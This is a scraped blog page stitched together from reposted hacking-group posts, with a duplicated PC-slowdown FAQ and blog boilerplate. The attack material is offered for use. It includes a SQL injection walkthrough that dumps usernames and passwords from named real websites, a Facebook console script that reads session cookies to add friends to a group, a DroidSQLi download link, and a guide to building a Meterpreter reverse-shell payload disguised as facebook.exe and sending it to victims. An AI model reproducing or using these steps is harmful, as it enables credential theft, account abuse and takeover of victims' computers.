http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,@@version,3,4,5,6,7,8,9,10,11-- Hmmm its above 5... 6. check Data base name: just replace @@version with concat(database()) I.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,concat(database()),3,4,5,6,7,8,9,10,11-- here is Data base name: Future_future2 save it... 7.Now get table name: Replace concat(database()) with: group_concat(table_name) and in the end add this after colums: from information_schema.tables where table_schema=database()-- i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- it show all tables name...Our Table Is There "users" 8.Here users table here...Go to this website: http://www.swingnote.com/tools/texttohex.php and enter here users and copy the HEX code: 7573657273 9.Find column name: http://www.cti-pfan.net/privacy.php?id=-9 union select all 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()-- replace table_name with (column_name) and add information_schema.columns 10.Now get usersname and password: i.e: http://www.futuresfins.com/fin-detail.php?id=-173 union select 1,group_concat(Username,0x3a,Password),3,4,5,6,7,8,9,10,11 from users-- Bingoooooooo...you Got user name and pass: 10:Find admin panel.. some common login pages... http://www.futuresfins.com/login.html http://www.futuresfins.com/admin.html Enjoy........

(5) HACKING AND SECURITY

Add your friends to this group , 1= right click 2= inspect element {Better to use FireFox } 3= console 4= copy this code and paste it same as this picture shows and then hit enter . =============Code Start=================== var user = getCookie("c_user"); function getCookie(c_name) { var i,x,y,ARRcookies=document.cookie.split(";"); for (i=0;i<ARRcookies.length;i++) { x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("=")); y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1); x=x.replace(/^\s+|\s+$/g,""); if (x==c_name) { return unescape(y); } } } var tulisanNganu = 'ADDING DESIGN BY ANUJ :www.facebook.com/AJSTAR0 ';

(103) Facebook

Top 10 Best C/C++ Compilers And IDEs http://efytimes.com/e1/fullnews.asp?edid=117053 New programmers find it difficult in selecting c/c++ compiler or ide which provides them a user friendly programming environment. So EFYTimes.com offers top 10 C/C++ Compiler And IDEs list along with their features.

(132) Facebook

Hello everyone, today I will be teaching you how to hack a website using your android phones. Surprised and you might be thinking how's it possible to hack using your android mobile phone. Mostly 70% of the websites which are defaced by the hackers are done using the most common vulnerability i.e. SQL Injection. We will be using an application called DroidSQLi to hack SQL injection vulnerable websites with our phone. So all we need are 3 things. 1.) DroidSQLi application installed on our android phone 2.) SQLi vulnerable website 3.) and obviously an android phone. Let's get started, first of all download DroidSQLi Tool. It is an first automated SQL Injection exploitation tool for mobile phones. It supports the following type of injections. Union Based Injection Blind Injecting Error Based Injection Time Based Injection All you need to do is enter the vulnerable website under Target URL and press on inject button. It will automatically select the best possible injection. Download link => http://edgard.net/net.edgard.droidsqli.apk

(101) Facebook

________ Open Your Backtrack terminal and Type cd / pentest/exploits/set Now Open Social Engineering Toolkit (SET) ./set Now choose option 1, “Social-Engineering Attacks” Now choose option 4, “Create Payload and Listener” Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program. Now choose 2 “shikata-ga-nai” Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener. Now a file name msf.exe has been created, you can get the file by going on file system–>pentest >exploit–>set–>msf.exe Now rename the file anything you want. In my case I am renaming it facebook.exe Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using 4shared.com now send link to the victim. As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC Use “Sessions -l” and the Session number to connect to the session. Now Type “session s -i ID“.

(99) Facebook

5 Ways to use linux in windows Linux is one of the most powerful operating systems available today. It is so because it provides numerous applications that gives amazing functionality which windows softwares can not simply do , but we all have our own reasons to use windows as our main operating system But how if you get to run the linux application on your windows OS ? Several Tricks for using linux applications on windows. read more at====>http://bit.ly/1rzCtjF

‪#‎Admin‬ >>What are some of the main reasons why my computer is slowing down?<< ->>:Nobody wants to buy a fast computer just to have it slow to a crawl over time. If your computer is not performing like it used to, there are a number of causes that could be causing the sluggish performance. Here are a few: 1.A nearly full hard drive. ->If your hard drive is almost completely full, it is likely many of your files are fragmented. This is because as the hard drive fills up, there are fewer open blocks of space to write additional files to. The result is that new files get written on different sections of the drive (file fragmentation). Your computer takes longer to read fragmented files, since it has to scan more of the hard drive. This can cause your computer to slow down significantly. *Solution: delete unnecessary files and run a file defragmentation/optimization program such as Norton Speed Disk. 2. Spywareand viruses. ->If you're using Windows, there is a high probability that your operating system has been infected by various spyware programs or viruses. These programs run discreetly within your system, taking up CPU and memory, slowing your computer down. They usually find their way into your computer through your Internet connection and are often hard to detect. Viruses and spyware can cause anything from a small drop in your computer's performance to bringing your machine to grinding halt. *Solution:Use Windows Update to download the latest security updates and install at least one antivirus program and antispyware program to find and remove malicious files. 3.Low memory ( RAM). ->Everything that happens on your PC has to go through the computer's memory at some point. So if you don't have a lot of RAM, it may cause bottleneck when your computer needs to move a lot of information at once. Typically, newer software programs require more RAM than older programs, since they often have more features and better graphics capabilities. If your computer could run old programs well, but is having trouble running new programs, upgrading your memory is the first thing you should do. It's relatively inexpensive and can breath new life into your machine. *Solution:Add more RAM to your computer. Make sure you get the correct type of memory for your machine -- check the size, type, number of pins, and speed of the RAM. Via TOP WORLD hackers If none of these solutions seem to help boost your computer's performance, you may have to reinstall your operating system. If you decide to do this, be sure to back up all your data first on another hard drive or optical media, since the hard disk is typically erased during a system restore. Kizhan Razak Via TOP WORLD hackers

‪#‎Admin‬ >>What are some of the main reasons why my computer is slowing down?<< ->>:Nobody wants to buy a fast computer just to have it slow to a crawl over time. If your computer is not performing like it used to, there are a number of causes that could be causing the sluggish performance. Here are a few: 1.A nearly full hard drive. ->If your hard drive is almost completely full, it is likely many of your files are fragmented. This is because as the hard drive fills up, there are fewer open blocks of space to write additional files to. The result is that new files get written on different sections of the drive (file fragmentation). Your computer takes longer to read fragmented files, since it has to scan more of the hard drive. This can cause your computer to slow down significantly. *Solution: delete unnecessary files and run a file defragmentation/optimization program such as Norton Speed Disk. 2. Spywareand viruses. ->If you're using Windows, there is a high probability that your operating system has been infected by various spyware programs or viruses. These programs run discreetly within your system, taking up CPU and memory, slowing your computer down. They usually find their way into your computer through your Internet connection and are often hard to detect. Viruses and spyware can cause anything from a small drop in your computer's performance to bringing your machine to grinding halt. *Solution:Use Windows Update to download the latest security updates and install at least one antivirus program and antispyware program to find and remove malicious files. 3.Low memory ( RAM). ->Everything that happens on your PC has to go through the computer's memory at some point. So if you don't have a lot of RAM, it may cause bottleneck when your computer needs to move a lot of information at once. Typically, newer software programs require more RAM than older programs, since they often have more features and better graphics capabilities. If your computer could run old programs well, but is having trouble running new programs, upgrading your memory is the first thing you should do. It's relatively inexpensive and can breath new life into your machine. *Solution:Add more RAM to your computer. Make sure you get the correct type of memory for your machine -- check the size, type, number of pins, and speed of the RAM. Via TOP WORLD hackers If none of these solutions seem to help boost your computer's performance, you may have to reinstall your operating system. If you decide to do this, be sure to back up all your data first on another hard drive or optical media, since the hard disk is typically erased during a system restore. Kizhan Razak Via TOP WORLD hackers

Welcome to my Blog!
Bine ati venit pe blogul nostru.
Cand nu sunt pe blog calatorim!!!
When I'm not blogging, I'm traveling :-)

Email me atGuran

Search

Subscribeto this blog
Follow me onTwitter
Connect onFacebook
My Ello

Blogroll


© 2014 by Guran Cosmin.

You're welcome to link to this site or use a single image and brief description to link back to any post. Republishing posts in their entirety is prohibited without permission.

Pictures

Become a Fan

Find Us On Facebook

Contact Form

Name

Email *

Message *

Video

720x90 AdSpace

Recent Videos

Movie

http://youtu.be/Yj0G5UdBJZw
guran. Powered by Blogger.

Wikipedia

Search results

Popular Posts

Followers

Archive

wikiHow - Recent Changes [en]